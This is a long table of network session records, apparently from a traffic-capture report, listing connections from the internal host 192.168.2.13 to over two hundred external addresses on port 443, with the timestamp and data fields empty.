                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17950192.168.2.135492253.207.12.2443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17951192.168.2.1339486120.164.5.118443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17952192.168.2.136039049.66.177.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17953192.168.2.1337584111.133.23.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17954192.168.2.1353320211.10.227.235443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17955192.168.2.1355328220.56.92.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17956192.168.2.135001661.171.14.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17957192.168.2.133323434.182.89.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17958192.168.2.1340698145.45.111.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17959192.168.2.133356287.112.202.219443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17960192.168.2.1352410166.96.231.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17961192.168.2.135688877.230.40.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17962192.168.2.1343884128.109.115.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17963192.168.2.135388282.203.206.200443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17964192.168.2.13584269.134.128.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17965192.168.2.135505085.133.223.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17966192.168.2.135828835.40.72.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17967192.168.2.133822089.43.169.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17968192.168.2.1343894114.173.119.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17969192.168.2.135533442.120.78.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17970192.168.2.1335952119.26.142.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17971192.168.2.1344810186.188.17.36443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17972192.168.2.1337402162.53.184.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17973192.168.2.1347906186.7.40.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17974192.168.2.134839482.28.22.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17975192.168.2.134529614.22.22.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17976192.168.2.1339666195.24.132.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17977192.168.2.1341370218.42.23.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17978192.168.2.1351196220.145.22.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17979192.168.2.134476074.151.47.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17980192.168.2.134215897.34.31.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17981192.168.2.1343794109.54.213.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17982192.168.2.135468469.174.55.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17983192.168.2.134282876.218.14.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17984192.168.2.1341292150.225.127.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17985192.168.2.1345080175.255.71.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17986192.168.2.1333798118.158.34.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17987192.168.2.1336508148.251.157.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17988192.168.2.1348714105.210.134.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17989192.168.2.134032494.2.105.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17990192.168.2.1335024190.40.166.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17991192.168.2.1358880195.94.13.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17992192.168.2.1341178126.234.210.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17993192.168.2.134492046.243.155.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17994192.168.2.1340592174.124.136.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17995192.168.2.1355436107.70.64.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17996192.168.2.13534028.121.231.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17997192.168.2.133782424.114.163.13443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17998192.168.2.135193831.10.25.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17999192.168.2.134080263.140.158.200443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18000192.168.2.1337416209.49.75.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18001192.168.2.1335892190.220.188.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18002192.168.2.1359928216.160.54.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18003192.168.2.134843637.142.190.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18004192.168.2.1332932162.215.156.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18005192.168.2.1359016108.130.137.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18006192.168.2.1346050180.44.80.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18007192.168.2.135914436.214.147.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18008192.168.2.134654653.75.87.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18009192.168.2.133525820.129.208.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18010192.168.2.133634071.114.213.2443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18011192.168.2.134062481.37.17.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18012192.168.2.136032295.151.63.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18013192.168.2.1359692153.22.165.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18014192.168.2.1341838152.224.174.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18015192.168.2.1343852213.190.245.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18016192.168.2.1351212177.45.232.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18017192.168.2.1344902115.52.245.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18018192.168.2.136057238.147.7.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18019192.168.2.134783219.24.255.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18020192.168.2.1352262123.41.41.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18021192.168.2.1336174133.129.45.66443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18022192.168.2.1334104144.255.126.229443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18023192.168.2.1352254115.69.182.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18024192.168.2.1345562184.73.97.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18025192.168.2.135564452.31.132.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18026192.168.2.133298613.49.91.225443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18027192.168.2.1337372108.222.208.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18028192.168.2.1333766196.11.118.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18029192.168.2.1342616160.36.225.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18030192.168.2.1333328207.160.102.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18031192.168.2.1357614168.95.182.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18032192.168.2.1352282177.176.182.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18033192.168.2.1342924153.166.235.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18034192.168.2.133996684.128.16.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18035192.168.2.1356470185.33.61.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18036192.168.2.1349870194.239.15.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18037192.168.2.1336796157.157.15.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18038192.168.2.134495435.247.160.105443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18039192.168.2.135844020.6.1.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18040192.168.2.135348885.94.57.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18041192.168.2.134413843.19.159.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18042192.168.2.1360024148.141.78.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18043192.168.2.1335006182.31.229.219443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18044192.168.2.135280463.19.209.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18045192.168.2.1337542160.52.35.255443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18046192.168.2.1348710205.130.86.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18047192.168.2.1334276192.223.81.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18048192.168.2.1345820106.54.228.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18049192.168.2.1340246160.199.151.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18050192.168.2.1359986122.82.163.76443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18051192.168.2.1345642119.10.27.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18052192.168.2.1339560195.117.139.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18053192.168.2.1340206163.158.252.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18054192.168.2.133380445.230.220.213443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18055192.168.2.134916463.198.239.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18056192.168.2.135799614.212.66.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18057192.168.2.1359042199.52.63.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18058192.168.2.1336378153.237.177.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18059192.168.2.135798213.183.175.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18060192.168.2.135804451.176.252.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18061192.168.2.1353620128.112.77.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18062192.168.2.1333618135.196.20.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18063192.168.2.135611290.108.230.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18064192.168.2.1344758164.63.179.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18065192.168.2.1358110190.155.155.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18066192.168.2.133296854.63.72.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18067192.168.2.134336268.86.65.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18068192.168.2.1340084208.39.237.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18069192.168.2.135342279.108.246.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18070192.168.2.1357704116.112.212.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18071192.168.2.135004690.180.197.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18072192.168.2.134355819.105.24.246443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18073192.168.2.134092296.24.191.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18074192.168.2.1354784212.231.11.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18075192.168.2.136007077.97.169.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18076192.168.2.1357336208.221.252.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18077192.168.2.1333042153.188.237.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18078192.168.2.1353602141.203.171.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18079192.168.2.1351194130.119.48.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18080192.168.2.13536281.90.177.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18081192.168.2.1337458208.62.184.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18082192.168.2.1352034131.225.96.233443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18083192.168.2.1345972141.236.67.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18084192.168.2.1344350216.230.56.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18085192.168.2.1337210199.95.45.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18086192.168.2.133941062.39.156.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18087192.168.2.1344204111.232.233.70443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18088192.168.2.1348676199.224.15.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18089192.168.2.1353136109.153.250.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18090192.168.2.13557669.113.201.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18091192.168.2.135473676.5.106.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18092192.168.2.1332968218.61.118.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18093192.168.2.1360620161.169.21.37443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18094192.168.2.1350142113.204.211.246443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18095192.168.2.1333876128.153.7.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18096192.168.2.13405764.92.103.200443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18097192.168.2.133293841.57.53.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18098192.168.2.1340756125.235.6.233443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18099192.168.2.1359720173.113.39.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18100192.168.2.1341642218.26.161.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18101192.168.2.1360378218.98.67.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18102192.168.2.1348728119.178.227.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18103192.168.2.1338258111.198.254.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18104192.168.2.1341970121.49.88.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18105192.168.2.1348578143.210.244.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18106192.168.2.133942058.93.222.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18107192.168.2.1356198134.150.167.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18108192.168.2.1358874156.59.119.171443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18109192.168.2.133800452.190.152.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18110192.168.2.1360084182.204.50.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18111192.168.2.1351196206.254.148.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18112192.168.2.1354264172.107.172.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18113192.168.2.1351190118.3.157.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18114192.168.2.1342308124.95.187.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18115192.168.2.13548068.222.100.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18116192.168.2.1360398167.181.39.46443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18117192.168.2.134820251.121.90.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18118192.168.2.135702265.249.96.40443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18119192.168.2.1358940208.230.149.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18120192.168.2.13439489.217.97.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18121192.168.2.1357264108.244.33.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18122192.168.2.1347320185.164.132.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18123192.168.2.1337746212.205.132.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18124192.168.2.135823050.178.57.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18125192.168.2.1338610114.55.135.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18126192.168.2.134050064.244.138.105443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18127192.168.2.136022064.222.135.255443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18128192.168.2.1346038154.38.174.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18129192.168.2.133867470.41.236.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18130192.168.2.1342506211.36.26.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18131192.168.2.135501287.74.249.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18132192.168.2.1351794213.244.55.185443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18133192.168.2.135917254.30.231.57443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18134192.168.2.13474848.80.162.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18135192.168.2.1341610222.61.208.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18136192.168.2.1357986120.241.4.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18137192.168.2.1359660205.32.214.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18138192.168.2.133999481.193.234.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18139192.168.2.133843647.113.214.16443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18140192.168.2.1337780171.142.223.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18141192.168.2.135749296.233.161.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18142192.168.2.1344036115.61.30.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18143192.168.2.1342734175.16.157.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18144192.168.2.1344722125.190.175.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18145192.168.2.134628814.109.164.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18146192.168.2.136086023.188.151.226443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18147192.168.2.134046044.148.119.98443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18148192.168.2.134823482.15.10.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18149192.168.2.1339888126.118.175.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18150192.168.2.133289031.132.135.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18151192.168.2.133925834.247.121.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18152192.168.2.1350554135.76.88.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18153192.168.2.1357498129.219.53.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18154192.168.2.1359130219.148.69.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18155192.168.2.1346646158.171.204.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18156192.168.2.135160867.194.124.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18157192.168.2.133751623.163.127.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18158192.168.2.1335074212.192.214.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18159192.168.2.1341268183.85.83.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18160192.168.2.1346950123.131.218.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18161192.168.2.1355486148.74.82.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18162192.168.2.1352862188.82.2.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18163192.168.2.133993020.184.32.23443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18164192.168.2.1343812211.172.11.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18165192.168.2.134652425.12.185.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18166192.168.2.135214038.71.230.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18167192.168.2.1346750198.172.85.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18168192.168.2.1354108154.57.121.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18169192.168.2.135207018.113.249.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18170192.168.2.1350436165.16.6.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18171192.168.2.135847898.1.145.27443
